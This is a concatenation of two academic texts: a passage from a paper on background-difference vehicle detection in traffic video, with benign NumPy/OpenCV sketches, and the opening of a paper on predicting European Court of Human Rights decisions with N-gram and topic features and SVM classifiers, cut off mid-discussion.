B. Gaussian Distribution Background Model The Gaussian distribution background model was first proposed by N. Friedman et al. and is divided into background models with a single Gaussian distribution and with a mixture of Gaussian distributions. The single Gaussian model regards the change in the gray value of each pixel of the background image as a Gaussian random process and establishes a Gaussian model for each pixel, which is maintained by continuously updating the Gaussian background model. The mixed Gaussian model uses K (typically 3–5) Gaussian components to characterize the features of each pixel in the image. After a new image is acquired, the mixed Gaussian model is updated, and each pixel of the current image is matched against its Gaussian mixture model to determine whether it belongs to the background or the foreground. This section focuses on the mixed Gaussian background modeling method. This modeling method represents the background using statistical information, such as the probability density of a large number of sample values collected over a long time, and uses a statistical difference test (such as the 3σ principle) to judge each target pixel. This method can model complex dynamic backgrounds, at the cost of a large amount of computation. Suppose that any pixel (x, y) in the background obeys a model composed of K Gaussian distributions, as shown in formula (2):

P(I_{x,y}) = \sum_{j=1}^{K} \omega_{x,y,j} \cdot \eta(I_{x,y}, \mu_{x,y,j}, \sigma_{x,y,j})    (2)

where \eta(I_{x,y}, \mu_{x,y,j}, \sigma_{x,y,j}) is the j-th Gaussian probability density with mean \mu_{x,y,j} and variance \sigma_{x,y,j}, and \omega_{x,y,j} is the weight of the j-th Gaussian distribution. The pixel value observed at the current moment is compared with the current K Gaussian distributions in descending order of weight to obtain the best match. If there is no match, the pixel is a foreground point; otherwise it is a background point. The Gaussian distribution background model requires a large amount of calculation, stores many parameters, and takes a long time, which is not conducive to practical application.
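For reference, both of the classical models reviewed in this section have compact implementations. The sketch below shows a running mean over the last N frames in the spirit of formula (1), and uses OpenCV's built-in MOG2 background subtractor for the mixed Gaussian model; the parameter values shown are illustrative defaults, not the paper's settings.

```python
# Sketch of the two classical background models discussed above.
import numpy as np
import cv2

def average_background(frames):
    """Formula (1): the mean of the last N grayscale frames as the background."""
    stack = np.stack([f.astype(np.float32) for f in frames])
    return stack.mean(axis=0).astype(np.uint8)

# Mixed Gaussian background model (a few Gaussian components per pixel),
# using OpenCV's MOG2 implementation.
mog2 = cv2.createBackgroundSubtractorMOG2(history=500, varThreshold=16,
                                          detectShadows=False)
# For each new frame: fg_mask = mog2.apply(frame); bg = mog2.getBackgroundImage()
```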
III. IMPROVED BACKGROUND MODELING METHOD This paper proposes an adaptive background update model based on the inter-frame difference method. The method uses the background of the current frame and the background of the previous frame in the video sequence to perform a weighted average and so update the background. The specific update rules are given in formulas (3) and (4):

Diff(x, y, t) = | I(x, y, t) − B(x, y, t) |    (3)

BOM(x, y, t) = { 1, if Diff(x, y, t) > T_h;  0, otherwise }    (4)

where I(x, y, t) and B(x, y, t) are the current frame containing the moving object at time t and the updated current background image, and T_h is a threshold, taken as the gray level to the right of the maximum peak of the difference-image histogram at which the histogram falls to 1/10 of that peak. Equation (5) gives the motion template Stencil(x, y, t) at time t, obtained from two adjacent spaced images; it is used as a mask to determine which pixels of the current frame are used to update the current background. Formula (6) gives the instantaneous background, and the background is then updated using a weighted average of the instantaneous background and the current background, as shown in equation (7):

Stencil(x, y, t) = BOM(x, y, t) & BOM(x, y, t−1)    (5)

B_temp(x, y, t) = { B(x, y, t−1), if Stencil(x, y, t) = 0;  I(x, y, t), if Stencil(x, y, t) = 1 }    (6)

B(x, y, t) = α · B_temp(x, y, t) + (1 − α) · B(x, y, t−1)    (7)

Here α is the update coefficient; its value is positively correlated with the update speed. The larger α is, the faster the update, so that changes in external lighting can be captured in time and the current background stays closer to the external conditions of the current frame. The smaller α is, the slower the update rate, and the acquired current background will show some deviation. After the background image is extracted, the current motion area is segmented using the background difference method. Using the threshold parameter in expression (8), the image is binarized and segmented to obtain the foreground binary image:

D(x, y, t) = { 1, if Diff(x, y, t) > threshold;  0, otherwise }    (8)

The threshold in this formula should be selected carefully, based on the experimental results, so as to filter out the residual background.
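The update rules in formulas (3)–(8) translate almost line for line into array operations. The sketch below is one possible NumPy rendering for grayscale frames; the default parameter values are the ones quoted for this algorithm in the experiments (Th = 15, α = 0.2, threshold = 12), and the function names are illustrative.

```python
# Sketch of the proposed frame-difference-based background update (formulas 3-8).
import numpy as np

def update_background(frame, prev_bom, background, Th=15, alpha=0.2):
    """One update step; `background` is B(x,y,t-1) and `prev_bom` is BOM(x,y,t-1)."""
    diff = np.abs(frame.astype(np.int16) - background.astype(np.int16))    # (3)
    bom = (diff > Th).astype(np.uint8)                                     # (4)
    stencil = bom & prev_bom                                               # (5)
    # (6): instantaneous background: current pixel where Stencil = 1,
    # previous background where Stencil = 0.
    b_temp = np.where(stencil == 1, frame, background)
    new_bg = (alpha * b_temp + (1 - alpha) * background).astype(np.uint8)  # (7)
    return new_bg, bom

def segment_foreground(frame, background, threshold=12):
    """Formula (8): binarized foreground mask from the background difference."""
    diff = np.abs(frame.astype(np.int16) - background.astype(np.int16))
    return (diff > threshold).astype(np.uint8)
```

In a full pipeline, the BOM mask of each processed frame is carried forward so that the Stencil of equation (5) can be formed from two spaced frames.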
[Figure 1. Comparison of experimental results with the three methods. Panel (a) shows the original image frame; columns (b), (c) and (d) correspond to the statistical average method, the mixed Gaussian method and this article's algorithm, and rows (1)–(5) show the resulting background frame, the background/frame difference, the binary operation, the open operation and the close operation, respectively.]

It can be seen that, in the background frame extraction process, the background extracted by the statistical average method [Fig. 1 (b-1)] is blurred and affected by the shake of the video camera, and its effect is the worst. The parameters of the mixed Gaussian model are set as follows: the number of pixel models is 5, the initial variance is 30, and the learning rate of the model weights is α = 0.005, T = 0.7. The resulting background [Fig. 1 (c-1)] is clearer, but the background extracted at the lower left corner of the screen is still somewhat blurred. The corresponding parameter settings of this algorithm are: Th = 15, α = 0.2, threshold = 12. The background [Fig. 1 (d-1)] obtained by the method proposed in this paper is of good quality and closer to the real background. Finally, the result images are obtained after difference, binary processing and morphological processing. The statistical average method [Fig. 1 (b-5)] is noisy, and the extraction result is not clear. The result obtained by the Gaussian method [Fig. 1 (c-5)] works well, but there is still noise. The result obtained by this algorithm [Fig. 1 (d-5)] has the best effect: the noise is very small, the extracted vehicle is clearer and the connectivity is better.

B. Comparison of Algorithm Performance
The final conclusion of the comparison experiment is drawn not only from the experimental results but also from the performance side. Table I compares the performance of the three methods, including the time used for the entire detection process, the memory footprint and the CPU usage. It can be seen that, compared with the other two methods, the algorithm proposed in this paper consumes less time, uses less memory and has a lower CPU occupancy rate.

TABLE I. COMPARISON OF PERFORMANCE OF THREE MODELING METHODS
Background model          Time-consuming (seconds)   Average memory size (MB)   Average CPU usage
Statistical average       149                        169                        65%
Gaussian distribution     40                         99                         35%
Method of this article    25                         60                         32%

V. CONCLUSION
This paper focuses on the vehicle detection method based on background difference in the intelligent traffic field and proposes a background modeling method based on an adaptive inter-frame difference method. Experiments were designed to compare the proposed method with the commonly used averaging method and the Gaussian distribution model method by comparing the background images obtained by the three modeling methods. At the same time, the running performance of the algorithm is analyzed in terms of time consumption, memory occupancy and CPU occupancy, which verifies that the vehicle detection algorithm proposed in this paper can extract the background more accurately.
The morphological method is used to process the differential binary image to eliminate noise, fill in voids and so on, completing the detection step. Experiments prove the effectiveness and real-time performance of the algorithm for video-based moving vehicle detection. However, the performance of this algorithm under complex weather conditions and complex road conditions needs to be further improved.

work_2timpskoaza73ntj374tkxmaty ---- Predicting judicial decisions of the European Court of Human Rights: a Natural Language Processing perspective
Submitted 11 May 2016. Accepted 23 September 2016. Published 24 October 2016. Corresponding author: Nikolaos Aletras, nikos.aletras@gmail.com. Academic editor: Lexing Xie. Additional Information and Declarations can be found on page 16. DOI 10.7717/peerj-cs.93. Copyright 2016 Aletras et al. Distributed under Creative Commons CC-BY 4.0. OPEN ACCESS.

Predicting judicial decisions of the European Court of Human Rights: a Natural Language Processing perspective
Nikolaos Aletras1,2, Dimitrios Tsarapatsanis3, Daniel Preoţiuc-Pietro4,5 and Vasileios Lampos2
1 Amazon.com, Cambridge, United Kingdom
2 Department of Computer Science, University College London, University of London, London, United Kingdom
3 School of Law, University of Sheffield, Sheffield, United Kingdom
4 Positive Psychology Center, University of Pennsylvania, Philadelphia, United States
5 Computer & Information Science, University of Pennsylvania, Philadelphia, United States

ABSTRACT
Recent advances in Natural Language Processing and Machine Learning provide us with the tools to build predictive models that can be used to unveil patterns driving judicial decisions. This can be useful, for both lawyers and judges, as an assisting tool to rapidly identify cases and extract patterns which lead to certain decisions. This paper presents the first systematic study on predicting the outcome of cases tried by the European Court of Human Rights based solely on textual content. We formulate a binary classification task where the input of our classifiers is the textual content extracted from a case and the target output is the actual judgment as to whether there has been a violation of an article of the Convention on Human Rights. Textual information is represented using contiguous word sequences, i.e., N-grams, and topics. Our models can predict the court's decisions with a strong accuracy (79% on average). Our empirical analysis indicates that the formal facts of a case are the most important predictive factor. This is consistent with the theory of legal realism suggesting that judicial decision-making is significantly affected by the stimulus of the facts. We also observe that the topical content of a case is another important feature in this classification task and explore this relationship further by conducting a qualitative analysis.

Subjects: Artificial Intelligence, Computational Linguistics, Data Mining and Machine Learning, Data Science, Natural Language and Speech
Keywords: Natural Language Processing, Text Mining, Legal Science, Machine Learning, Artificial Intelligence, Judicial decisions

INTRODUCTION
In his prescient work on investigating the potential use of information technology in the legal domain, Lawlor surmised that computers would one day become able to analyse and predict the outcomes of judicial decisions (Lawlor, 1963). According to Lawlor, reliable prediction of the activity of judges would depend on a scientific understanding of the ways that the law and the facts impact on the relevant decision-makers, i.e., the judges. More than fifty years later, the advances in Natural Language Processing (NLP) and Machine Learning (ML) provide us with the tools to automatically analyse legal materials, so as to build successful predictive models of judicial outcomes.
2:e93; DOI 10.7717/peerj-cs.93 1An amicus curiae (friend of the court) is a person or organisation that offers testimony before the Court in the context of a particular case without being a formal party to the proceedings. In this paper, our particular focus is on the automatic analysis of cases of the European Court of Human Rights (ECtHR or Court). The ECtHR is an international court that rules on individual or, much more rarely, State applications alleging violations by some State Party of the civil and political rights set out in the European Convention on Human Rights (ECHR or Convention). Our task is to predict whether a particular Article of the Convention has been violated, given textual evidence extracted from a case, which comprises of specific parts pertaining to the facts, the relevant applicable law and the arguments presented by the parties involved. Our main hypotheses are that (1) the textual content, and (2) the different parts of a case are important factors that influence the outcome reached by the Court. These hypotheses are corroborated by the results. Our work lends some initial plausibility to a text-based approach with regard to ex ante prediction of ECtHR outcomes on the assumption that the text extracted from published judgments of the Court bears a sufficient number of similarities with, and can therefore stand as a (crude) proxy for, applications lodged with the Court as well as for briefs submitted by parties in pending cases. We submit, though, that full acceptance of that reasonable assumption necessitates more empirical corroboration. Be that as it may, our more general aim is to work under this assumption, thus placing our work within the larger context of ongoing empirical research in the theory of adjudication about the determinants of judicial decision-making. Accordingly, in the discussion we highlight ways in which automatically predicting the outcomes of ECtHR cases could potentially provide insights on whether judges follow a so-called legal model (Grey, 1983) of decision making or their behavior conforms to the legal realists’ theorization (Leiter, 2007), according to which judges primarily decide cases by responding to the stimulus of the facts of the case. We define the problem of the ECtHR case prediction as a binary classification task. We utilise textual features, i.e., N-grams and topics, to train Support Vector Machine (SVM) classifiers (Vapnik, 1998). We apply a linear kernel function that facilitates the interpretation of models in a straightforward manner. Our models can reliably predict ECtHR decisions with high accuracy, i.e., 79% on average. Results indicate that the ‘facts’ section of a case best predicts the actual court’s decision, which is more consistent with legal realists’ insights about judicial decision-making. We also observe that the topical content of a case is an important indicator whether there is a violation of a given Article of the Convention or not. Previous work on predicting judicial decisions, representing disciplinary backgrounds in political science and economics, has largely focused on the analysis and prediction of judges’ votes given non textual information, such as the nature and the gravity of the crime or the preferred policy position of each judge (Kort, 1957; Nagel, 1963; Keown, 1980; Segal, 1984; Popple, 1996; Lauderdale & Clark, 2012). 
More recent research shows that information from texts authored by amici curiae1 improves models for predicting the votes of the US Supreme Court judges (Sim, Routledge & Smith, 2015). Also, a text mining approach utilises sources of metadata about judge’s votes to estimate the degree to which those votes are about common issues (Lauderdale & Clark, 2014). Accordingly, this paper presents the first systematic study on predicting the decision outcome of cases tried at a major international court by mining the available textual information. Aletras etal (2016), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.93 2/19 2ECHtR provisional annual report for the year 2015: http://www.echr.coe.int/ Documents/Annual_report_2015_ENG. pdf. 3HUDOC ECHR Database: http://hudoc. echr.coe.int/. 4Nonetheless, not all cases that pass this first admissibility stage are decided in the same way. While the individual judge’s decision on admissibility is final and does not comprise the obligation to provide reasons, a Committee deciding a case may, by unanimous vote, declare the application admissible and render a judgment on its merits, if the legal issue raised by the application is covered by well-established case-law by the Court. Overall, we believe that building a text-based predictive system of judicial decisions can offer lawyers and judges a useful assisting tool. The system may be used to rapidly identify cases and extract patterns that correlate with certain outcomes. It can also be used to develop prior indicators for diagnosing potential violations of specific Articles in lodged applications and eventually prioritise the decision process on cases where violation seems very likely. This may improve the significant delay imposed by the Court and encourage more applications by individuals who may have been discouraged by the expected time delays. MATERIALS AND METHODS European Court of Human Rights The ECtHR is an international court set up in 1959 by the ECHR. The court has jurisdiction to rule on the applications of individuals or sovereign states alleging violations of the civil and political rights set out in the Convention. The ECHR is an international treaty for the protection of civil and political liberties in European democracies committed to the rule of law. The treaty was initially drafted in 1950 by the ten states which had created the Council of Europe in the previous year. Membership in the Council entails becoming party to the Convention and all new members are expected to ratify the ECHR at the earliest opportunity. The Convention itself entered into force in 1953. Since 1949, the Council of Europe and thus the Convention have expanded significantly to embrace forty-seven states in total, with a combined population of nearly 800 million. Since 1998, the Court has sat as a full-time court and individuals can apply to it directly, if they can argue that they have voiced their human rights grievance by exhausting all effective remedies available to them in their domestic legal systems before national courts. Case processing by the court The vast majority of applications lodged with the Court are made by individuals. Applications are first assessed at a prejudicial stage on the basis of a list of admissibility criteria. The criteria pertain to a number of procedural rules, chief amongst which is the one on the exhaustion of effective domestic remedies. 
If the case passes this first stage, it can either be allocated to a single judge, who may declare the application inadmissible and strike it out of the Court’s list of cases, or be allocated to a Committee or a Chamber. A large number of the applications, according to the court’s statistics fail this first admissibility stage. Thus, to take a representative example, according to the Court’s provisional annual report for the year 2015,2 900 applications were declared inadmissible or struck out of the list by Chambers, approximately 4,100 by Committees and some 78,700 by single judges. To these correspond, for the same year, 891 judgments on the merits. Moreover, cases held inadmissible or struck out are not reported, which entails that a text-based predictive analysis of them is impossible. It is important to keep this point in mind, since our analysis was solely performed on cases retrievable through the electronic database of the court, HUDOC.3 The cases analysed are thus the ones that have already passed the first admissibility stage,4 with the consequence that the Court decided on these cases’ merits under one of its formations. Aletras etal (2016), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.93 3/19 5Rules of ECtHR, http://www.echr.coe.int/ Documents/Rules_Court_ENG.pdf. Main premise Our main premise is that published judgments can be used to test the possibility of a text-based analysis for ex ante predictions of outcomes on the assumption that there is enough similarity between (at least) certain chunks of the text of published judgments and applications lodged with the Court and/or briefs submitted by parties with respect to pending cases. Predictive tasks were based on the text of published judgments rather than lodged applications or briefs simply because we did not have access to the relevant data set. We thus used published judgments as proxies for the material to which we do not have access. This point should be borne in mind when approaching our results. At the very least, our work can be read in the following hypothetical way: if there is enough similarity between the chunks of text of published judgments that we analyzed and that of lodged applications and briefs, then our approach can be fruitfully used to predict outcomes with these other kinds of texts. Case structure The judgments of the Court have a distinctive structure, which makes them particularly suitable for a text-based analysis. According to Rule 74 of the Rules of the Court,5 a judgment contains (among other things) an account of the procedure followed on the national level, the facts of the case, a summary of the submissions of the parties, which comprise their main legal arguments, the reasons in point of law articulated by the Court and the operative provisions. Judgments are clearly divided into different sections covering these contents, which allows straightforward standardisation of the text and consequently renders possible text-based analysis. More specifically, the sections analysed in this paper are the following: • Procedure: This section contains the procedure followed before the Court, from the lodging of the individual application until the judgment was handed down. • The facts: This section comprises all material which is not considered as belonging to points of law, i.e., legal arguments. 
It is important to stress that the facts in the above sense do not just refer to actions and events that happened in the past as these have been formulated by the Court, giving rise to an alleged violation of a Convention article. The ‘Facts’ section is divided in the following subsections: – The circumstances of the case: This subsection has to do with the factual background of the case and the procedure (typically) followed before domestic courts before the application was lodged by the Court. This is the part that contains materials relevant to the individual applicant’s story in its dealings with the respondent state’s authorities. It comprises a recounting of all actions and events that have allegedly given rise to a violation of the ECHR. With respect to this subsection, a number of crucial clarifications and caveats should be stressed. To begin with, the text of the ‘Circumstances’ subsection has been formulated by the Court itself. As a result, it should not always be understood as a neutral mirroring of the factual background of the case. The choices made by the Court when it comes to formulations of the facts incorporate implicit or explicit judgments to the effect that some facts are more Aletras etal (2016), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.93 4/19 relevant than others. This leaves open the possibility that the formulations used by the Court may be tailor-made to fit a specific preferred outcome. We openly acknowledge this possibility, but we believe that there are several ways in which it is mitigated. First, the ECtHR has limited fact-finding powers and, in the vast majority of cases, it defers, when summarizing the factual background of a case, to the judgments of domestic courts that have already heard and dismissed the applicants’ ECHR-related complaint (Leach, Paraskeva & Uelac, 2010; Leach, 2013). While domestic courts do not necessarily hear complaints on the same legal issues as the ECtHR does, by virtue of the incorporation of the Convention by all States Parties (Helfer, 2008), they typically have powers to issue judgments on ECHR-related issues. Domestic judgments may also reflect assumptions about the relevance of various events, but they also provide formulations of the facts that have been validated by more than one decision-maker. Second, the Court cannot openly acknowledge any kind of bias on its part. This means that, on their face, summaries of facts found in the ‘Circumstances’ section have to be at least framed in as neutral and impartial a way as possible. As a result, for example, clear displays of impartiality, such as failing to mention certain crucial events, seem rather improbable. Third, a cursory examination of many ECtHR cases indicates that, in the vast majority of cases, parties do not seem to dispute the facts themselves, as contained in the ‘Circumstances’ subsection, but only their legal significance (i.e., whether a violation took place or not, given those facts). As a result, the ‘Circumstances’ subsection contains formulations on which, in the vast majority of cases, disputing parties agree. Last, we hasten to add that the above three kinds of considerations do not logically entail that other forms of non-outright or indirect bias in the formulation of facts are impossible. 
However, they suggest that, in the absence of access to other kinds of textual data, such as lodged applications and briefs, the ‘Circumstances’ subsection can reasonably perform the function of a (sometimes crude) proxy for a textual representation of the factual background of a case. – Relevant law: This subsection of the judgment contains all legal provisions other than the articles of the Convention that can be relevant to deciding the case. These are mostly provisions of domestic law, but the Court also frequently invokes other pertinent international or European treaties and materials. • The law: The law section considers the merits of the case, through the use of legal argument. Depending on the number of issues raised by each application, the section is further divided into subsections that examine individually each alleged violation of some Convention article (see below). However, the Court in most cases refrains from examining all such alleged violations in detail. Insofar as the same claims can be made by invoking more than one article of the Convention, the Court frequently decides only those that are central to the arguments made. Moreover, the Court frequently refrains from deciding on an alleged violation of an article, if it overlaps sufficiently with some other violation it has already decided on. – Alleged violation of article x: Each subsection of the judgment examining alleged violations in depth is divided into two sub-sections. The first one contains the Parties’ Aletras etal (2016), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.93 5/19 6The data set is publicly available for download from https://figshare.com/s/ 6f7d9e7c375ff0822564. Figure 1 Procedure. This section contains the procedure followed before the Court, from the lodging of the individual application until the judgment was handed down. Submissions. The second one comprises the arguments made by the Court itself on the Merits. ∗ Parties’ submissions: The Parties’ Submissions typically summarise the main arguments made by the applicant and the respondent state. Since in the vast majority of cases the material facts are taken for granted, having been authoritatively established by domestic courts, this part has almost exclusively to do with the legal arguments used by the parties. ∗ Merits: This subsection provides the legal reasons that purport to justify the specific outcome reached by the Court. Typically, the Court places its reasoning within a wider set of rules, principles and doctrines that have already been established in its past case-law and attempts to ground the decision by reference to these. It is to be expected, then, that this subsection refers almost exclusively to legal arguments, sometimes mingled with bits of factual information repeated from previous parts. • Operative provisions: This is the section where the Court announces the outcome of the case, which is a decision to the effect that a violation of some Convention article either did or did not take place. Sometimes it is coupled with a decision on the division of legal costs and, much more rarely, with an indication of interim measures, under article 39 of the ECHR. Figures 1–4, show extracts of different sections from the Case of ‘‘Velcheva v. Bulgaria’’ (http://hudoc.echr.coe.int/sites/eng/pages/search.aspx?i=001-155099) following the structure described above. Data We create a data set6 consisting of cases related to Articles 3, 6, and 8 of the Convention. We focus on these three articles for two main reasons. 
First, these articles provided the most data we could automatically scrape. Second, it is of crucial importance that there should be a sufficient number of cases available, in order to test the models. Cases from the selected articles fulfilled both criteria. Table 1 shows the Convention right that each article protects and the number of cases in our data set. Aletras etal (2016), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.93 6/19 Figure 2 The facts. This section comprises all material which is not considered as belonging to points of law, i.e., legal arguments. Figure 3 The law. The law section is focused on considering the merits of the case, through the use of le- gal argument. Figure 4 Operative provisions. This is the section where the Court announces the outcome of the case, which is a decision to the effect that a violation of some Convention article either did or did not take place. Aletras etal (2016), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.93 7/19 Table 1 Articles of the Convention and number of cases in the data set. Article numbers, Convention right that each article protects and the number of cases in our data set. Article Human Right Cases 3 Prohibits torture and inhuman and degrading treatment 250 6 Protects the right to a fair trial 80 8 Provides a right to respect for one’s ‘‘private and family life, his home and his correspondence’’ 254 For each article, we first retrieve all the cases available in HUDOC. Then, we keep only those that are in English and parse them following the case structure presented above. We then select an equal number of violation and non-violation cases for each particular article of the Convention. To achieve a balanced number of violation/non-violation cases, we first count the number of cases available in each class. Then, we choose all the cases in the smaller class and randomly select an equal number of cases from the larger class. This results to a total of 250, 80 and 254 cases for Articles 3, 6 and 8, respectively. Finally, we extract the text under each part of the case by using regular expressions, making sure that any sections on operative provisions of the Court are excluded. In this way, we ensure that the models do not use information pertaining to the outcome of the case. We also preprocess the text by lower-casing and removing stop words (i.e., frequent words that do not carry significant semantic information) using the list provided by NLTK (https://raw.githubusercontent.com/nltk/nltk_data/ghpages/packages/corpora/ stopwords.zip). Description of textual features We derive textual features from the text extracted from each section (or subsection) of each case. These are either N-gram features, i.e., contiguous word sequences, or word clusters, i.e., abstract semantic topics. • N-gram features: The Bag-of-Words (BOW) model (Salton, Wong & Yang, 1975; Salton & McGill, 1986) is a popular semantic representation of text used in NLP and Information Retrieval. In a BOW model, a document (or any text) is represented as the bag (multiset) of its words (unigrams) or N-grams without taking into account grammar, syntax and word order. That results to a vector space representation where documents are represented as m-dimensional variables over a set of m N-grams. N-gram features have been shown to be effective in various supervised learning tasks (Bamman, Eisenstein & Schnoebelen, 2014; Lampos & Cristianini, 2012). For each set of cases in our data set, we compute the top-2000 most frequent N-grams where N ∈ {1,2,3,4}. 
Each feature represents the normalized frequency of a particular N-gram in a case or a section of a case. This can be considered as a feature matrix, C ∈ Rc×m, where c is the number of the cases and m = 2,000. We extract N-gram features for the Procedure (Procedure), Circumstances (Circumstances), Facts (Facts), Relevant Law (Relevant Law), Law (Law) and the Full case (Full) respectively. Note that the representations of the Facts is obtained by taking the mean vector of Circumstances and Relevant Law. In a similar Aletras etal (2016), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.93 8/19 way, the representation of the Full case is computed by taking the mean vector of all of its sub-parts. • Topics: We create topics for each article by clustering together N-grams that are semantically similar by leveraging the distributional hypothesis suggesting that similar words appear in similar contexts. We thus use the C feature matrix (see above), which is a distributional representation (Turney & Pantel, 2010) of the N-grams given the case as the context; each column vector of the matrix represents an N-gram. Using this vector representation of words, we compute N-gram similarity using the cosine metric and create an N-gram by N-gram similarity matrix. We finally apply spectral clustering (von Luxburg, 2007)—which performs graph partitioning on the similarity matrix—to obtain 30 clusters of N-grams. For Articles 6 and 8, we use the Article 3 data for selecting the number of clusters T , where T = {10,20,...,100}, while for Article 3 we use Article 8. Given that the obtained topics are hard clusters, an N-gram can only be part of a single topic. A representation of a cluster is derived by looking at the most frequent N-grams it contains. The main advantages of using topics (sets of N-grams) instead of single N-grams is that it reduces the dimensionality of the feature space, which is essential for feature selection, it limits overfitting to training data (Lampos et al., 2014; Preoţiuc-Pietro, Lampos & Aletras, 2015; Preoţiuc-Pietro et al., 2015) and also provides a more concise semantic representation. Classification model The problem of predicting the decisions of the ECtHR is defined as a binary classification task. Our goal is to predict if, in the context of a particular case, there is a violation or non-violation in relation to a specific Article of the Convention. For that purpose, we use each set of textual features, i.e., N-grams and topics, to train Support Vector Machine (SVM) classifiers (Vapnik, 1998). An SVM is a machine learning algorithm that has shown particularly good results in text classification, especially using small data sets (Joachims, 2002; Wang & Manning, 2012). We employ a linear kernel since that allows us to identify important features that are indicative of each class by looking at the weight learned for each feature (Chang & Lin, 2008). We label all the violation cases as +1, while no violation is denoted by −1. Therefore, features assigned with positive weights are more indicative of violation, while features with negative weights are more indicative of no violation. The models are trained and tested by applying a stratified 10-fold cross validation, which uses a held-out 10% of the data at each stage to measure predictive performance. The linear SVM has a regularisation parameter of the error term C, which is tuned using grid-search. For Articles 6 and 8, we use the Article 3 data for parameter tuning, while for Article 3 we use Article 8. 
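To make the experimental setup concrete, the following sketch shows one way to reproduce the N-gram feature extraction and classification steps described above using scikit-learn. It is an illustrative approximation, not the authors' released code: the input format (a list of section texts with ±1 labels) is an assumption, the topic-cluster features are omitted for brevity, and nested grid search over C is used as a stand-in for the paper's cross-Article tuning.

```python
import numpy as np
from sklearn.feature_extraction.text import CountVectorizer
from sklearn.model_selection import GridSearchCV, StratifiedKFold, cross_val_score
from sklearn.svm import LinearSVC

def ngram_features(texts):
    """Top-2000 most frequent N-grams (N = 1..4), as normalized frequencies per case."""
    vectorizer = CountVectorizer(ngram_range=(1, 4), max_features=2000, lowercase=True)
    counts = vectorizer.fit_transform(texts).astype(np.float64)
    row_sums = np.asarray(counts.sum(axis=1)).ravel()
    row_sums[row_sums == 0] = 1.0
    return counts.multiply(1.0 / row_sums[:, None]).tocsr(), vectorizer

def evaluate(texts, labels):
    """Mean 10-fold cross-validated accuracy of a linear SVM on N-gram features.

    texts  -- list of strings, e.g. the 'Circumstances' section of each case
    labels -- array of +1 (violation) / -1 (no violation)
    """
    X, _ = ngram_features(texts)
    # The paper tunes C on the data of a different Article; a nested grid search
    # over C is used here instead as a simple substitute.
    clf = GridSearchCV(LinearSVC(), {"C": [0.01, 0.1, 1, 10, 100]}, cv=5)
    folds = StratifiedKFold(n_splits=10, shuffle=True, random_state=0)
    scores = cross_val_score(clf, X, np.asarray(labels), cv=folds, scoring="accuracy")
    return scores.mean(), scores.std()
```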
RESULTS AND DISCUSSION
Predictive accuracy
We compute the predictive performance of both sets of features on the classification of the ECtHR cases. Performance is computed as the mean accuracy obtained by 10-fold cross-validation. Accuracy is computed as follows:

Accuracy = (TV + TNV) / (V + NV)    (1)

where TV and TNV are the numbers of cases correctly classified as a violation or a non-violation of an Article of the Convention, respectively, and V and NV represent the total numbers of cases where there is a violation or no violation, respectively.

Table 2. Accuracy of the different feature types across Articles: accuracy of predicting violation/non-violation of cases on 10-fold cross-validation using an SVM with a linear kernel. Parentheses contain the standard deviation from the mean. The accuracy of a random guess is .50.

Feature Type                 Article 3    Article 6    Article 8    Average
N-grams: Full                .70 (.10)    .82 (.11)    .72 (.05)    .75
N-grams: Procedure           .67 (.09)    .81 (.13)    .71 (.06)    .73
N-grams: Circumstances       .68 (.07)    .82 (.14)    .77 (.08)    .76
N-grams: Relevant law        .68 (.13)    .78 (.08)    .72 (.11)    .73
N-grams: Facts               .70 (.09)    .80 (.14)    .68 (.10)    .73
N-grams: Law                 .56 (.09)    .68 (.15)    .62 (.05)    .62
Topics                       .78 (.09)    .81 (.12)    .76 (.09)    .78
Topics and circumstances     .75 (.10)    .84 (.11)    .78 (.06)    .79

Table 2 shows the accuracy of each set of features across articles using a linear SVM. The rightmost column also shows the mean accuracy across the three articles. In general, both N-gram and topic features achieve good predictive performance. Our main observation is that both language use and topicality are important factors that appear to stand as reliable proxies of judicial decisions. Therefore, we take a further look into the models by attempting to interpret the differences in accuracy. We observe that 'Circumstances' is the best subsection to predict the decisions for cases in Articles 6 and 8, with a performance of .82 and .77 respectively. In Article 3, we obtain better predictive accuracy (.70) using the text extracted from the full case ('Full'), while the performance of 'Circumstances' is almost comparable (.68). We should again note here that the 'Circumstances' subsection contains information regarding the factual background of the case, as this has been formulated by the Court. The subsection therefore refers to the actions and events which triggered the case and gave rise to a claim made by an individual to the effect that the ECHR was violated by some state. On the other hand, 'Full', which is a mixture of information contained in all of the sections of a case, surprisingly fails to improve over using only the 'Circumstances' subsection. This entails that the factual background contained in the 'Circumstances' is the most important textual part of the case when it comes to predicting the Court's decision. The other sections and subsections that refer to the facts of a case, namely 'Procedure', 'Relevant Law' and 'Facts', achieve somewhat lower performance (.73 cf. .76), although they remain consistently above chance. Recall, at this point, that the 'Procedure' subsection consists only of general details about the applicant, such as the applicant's name or country of origin, and the procedure followed before domestic courts.
Sci., DOI 10.7717/peerj-cs.93 10/19 On the other hand, the ‘Law’ subsection, which refers either to the legal arguments used by the parties or to the legal reasons provided by the Court itself on the merits of a case consistently obtains the lowest performance (.62). One important reason for this poor performance is that a large number of cases does not include a ‘Law’ subsection, i.e., 162, 52 and 146 for Articles 3, 6 and 8 respectively. That happens in cases that the Court deems inadmissible, concluding to a judgment of non-violation. We also observe that the predictive accuracy is high for all the Articles when using the ‘Topics’ as features, i.e., .78, .81 and .76 for Articles 3, 6 and 8 respectively. ‘Topics’ obtain the best performance in Article 3 and performance comparable to ‘Circumstances’ in Articles 6 and 8. ‘Topics’ form a more abstract way of representing the information contained in each case and capture a more general gist of the cases. Combining the two best performing sets of features (‘Circumstances’ and ‘Topics’) we achieve the best average classification performance (.79). The combination also yields slightly better performance for Articles 6 and 8 while performance marginally drops for Article 3. That is .75, .84 and .78 for Articles 3, 6 and 8 respectively. Discussion The consistently more robust predictive accuracy of the ‘Circumstances’ subsection suggests a strong correlation between the facts of a case, as these are formulated by the Court in this subsection, and the decisions made by judges. The relatively lower predictive accuracy of the ‘Law’ subsection could also be an indicator of the fact that legal reasons and arguments of a case have a weaker correlation with decisions made by the Court. However, this last remark should be seriously mitigated since, as we have already observed, many inadmissibility cases do not contain a separate ‘Law’ subsection. Legal formalism and realism These results could be understood as providing some evidence for judicial decision-making approaches according to which judges are primarily responsive to non-legal, rather than to legal, reasons when they decide appellate cases. Without going into details with respect to a particularly complicated debate that is out of the scope of this 